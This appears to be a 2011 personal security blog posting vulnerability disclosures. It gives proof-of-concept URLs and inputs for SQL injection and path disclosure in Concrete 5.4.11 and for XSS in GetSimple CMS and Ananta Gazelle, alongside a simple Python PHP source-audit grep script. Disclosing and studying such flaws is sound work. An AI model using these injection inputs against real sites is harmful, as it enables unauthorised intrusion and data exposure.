Its 3:44 AM ...
I connect my tool to src audit (next version of script described few posts ago) and one of proxy program.
Results: 23 vulnerabilities found: 6 SQL Injections and XSS (few stored) and...
I will post it here as soon as Vendors answers me. And...
Its 3:46 AM... ;)
Monday, 21 November 2011
Saturday, 19 November 2011
SQLi/Info Disclo in Concrete 5.4.11
Another old bug...
# --------------------------------------------------------------------------- #
# - Title : SQL Injection/Info Disclosure in Concrete 5.4.11
# - Tested on : Ubuntu
# - Date : 3o.o3.2o11
# - Download Link : sourceforge.net
# - Author : ;)
# - Greetz :
# --------------------------------------------------------------------------- #
1. Log in to CMS.
2. Go to:
http://localhost/concrete5.4.1.1/index.php/tools/required/files/search_results?&ccm_order_by=fDateAdded&ccm_order_dir='rap&searchInstance=file1301504000
3. Thats it!
* path disclo is also here:
http://localhost/concrete5.4.1.1/index.php/tools/required/files/search_results?searchInstance=file1301504000&submit_search=1&fType=&fExtension=&ccm_order_dir=&ccm_order_by=&fileSelector=&fKeywords=aaa&numResults=%22&searchField=&selectedSearchField[]=&ccm-search-files=Search
# regards,
# .
GetSimple CMS 2.03.1 XSS
Some old info that I found on my other disk. Enjoy:
# --------------------------------------------------------------------------- #
# - Title : GetSimple CMS 2.03.1
# - Tested on : Ubuntu
# - Date : 24/27.o3.2o11
# - Download Link : @sourceforge.net
# - Author : ;)
# - Greetz :
# --------------------------------------------------------------------------- #
czw, 24 mar 2011, 22:05:57 CET
Get Simple CMS 2.03.1
http://localhost/www/cms/GetSimple_2.03.1.zip-unzip/GetSimple/admin/edit.php
'Create New Page'
post in title "><script> and view
27.o3.2o11 GetSimple 2.03.1 XSS for logged (http://www.cagintranetworks.com/)
http://localhost/www/cms/GetSimple_2.03.1.zip-unzip/GetSimple/admin/theme.php
vulnerable param:
$template="><script>alert(2)</script>
regards,
Simple "scanner" from PentestMag
I decide to publish this simple source code scanner.
I sent it to article in Pentest Magazine first, but now I'm working on better version, so maybe this one will help somebody :)
Idea is simple: do some 'grep' tricks, and write it as an output.html :)
I will be glad if it helps someone to better understand Python :)
If You have any questions, feel free to ask.
I sent it to article in Pentest Magazine first, but now I'm working on better version, so maybe this one will help somebody :)
Idea is simple: do some 'grep' tricks, and write it as an output.html :)
# ---------------------------------------------------
# knewme.py @ 2o11 - v3
# ---------------------------------------------------
# This is a sample 'dirty hack' for php src audit.
#
# dated :
# xx.o9.2o11 + ...?
# 28.o9.2o11 + php files 'founded'
# 27.o9.2o11 + output.html
# + project started
#----------------------------------------------------
# run: python knewme.py /dir/with/files/in/php/
# hf o/
#
import sys # arg
import glob # list files end elemIT
import getopt # opts implementation
# --------------------------------------------------
# argvs
try:
opts, args = getopt.getopt(sys.argv[1:], "hdf:v", ["help","dir=","file="])
except getopt.GetoptError, err:
print str(err)
print "Ups... ;C Try with -h;)"
sys.exit(2)
verbose = False
for o, a in opts:
if o == "-v":
verbose = True
elif o in ("-h","--help"):
print ""
print "\t-----------------------------"
print "\t[<>] knewme.py @ 2o11.v3 [<>]"
print "\t-----------------------------"
print "try this way:"
print "\t-d /dir/where/you/wanna/find/phps"
print "\t-f /dir/where/is/your/file.php"
print "\t-h thats me!"
print "\n[~] try again ;)"
elif o in ("-d","--dir"):
path = sys.argv[2] +"*.php" # updated by glob() 28.o9 to find .phps
logfile = open('dir_check.log','w')
for stri in glob.glob(path):
log = logfile.write(stri) # ---| these 2 lines log to file $logfile
log = logfile.write("\n") # ---|
logfile.close()
print ("[+] List of php files founded at "+path+" are noted in [dir_check.log]")
print "[i] You should test it manualy now."
sys.exit()
elif o in ("-f","--file"):
path = sys.argv[2] # = argv[1]
filek = open(path, 'r') # read mode
stri = filek.readlines() #
filek.close() # close the file (its already 'readed'
print " <html><head><title> KnewMe Project @ 2011 - This is Your Rerport</title></head>"
print " <body><br>"
print " <center><b><h1> KnewMe Project @ 2011 <br></b><center></h1>"
print "<b><p align=\"left\"><br>[+] Now checking file: ", filek.name
print "</b>"
vulnlist = open('vuln.php_list','r')
for vulnline in vulnlist:
print ("<b><p align=\"left\">[+] Possible vulnerable function name is : <font color=\"red\"> "+vulnline+" </font> </p></b>")
i=1
v = vulnline.strip()
for line in stri: # for $line.find(?) in str=filedsk
if line.find(v) != -1:
print ""
print " <table border=\"1\">"
print " <tr bgcolor=\"teal\">"
print " <th>line</td><td>check this</th>"
print " </tr><tr bgcolor=\"white\">"
print (" <td> %d </td><td> %s </td>") % (i,line)
print "<br>"
print " </tr>"
print " </table>"
print "</body></html>"
i+=1
# ----------------------------------------------------------- end of for...
print "<b>---------------[ END of this test HERE ] ---------------</br>"
# --------------------------------------------------------------------end of for...
# print ""
# print "[+] vulnerable function list : vuln.php_list"
# print ""
# -- end of last elif
else:
assert False, "unhandled option"
I will be glad if it helps someone to better understand Python :)
If You have any questions, feel free to ask.
Monday, 14 November 2011
Ananta Gazelle1.0 CMS XSS
This is very nice CMS. But there is a nice XSS too ;)
Go to:
http://Ananta_Gazelle1.0/search.php?lookup=">:)<here:)>alert(1)</here:)>
Go to:
http://Ananta_Gazelle1.0/search.php?lookup=">:)<here:)>alert(1)</here:)>
Subscribe to:
Posts (Atom)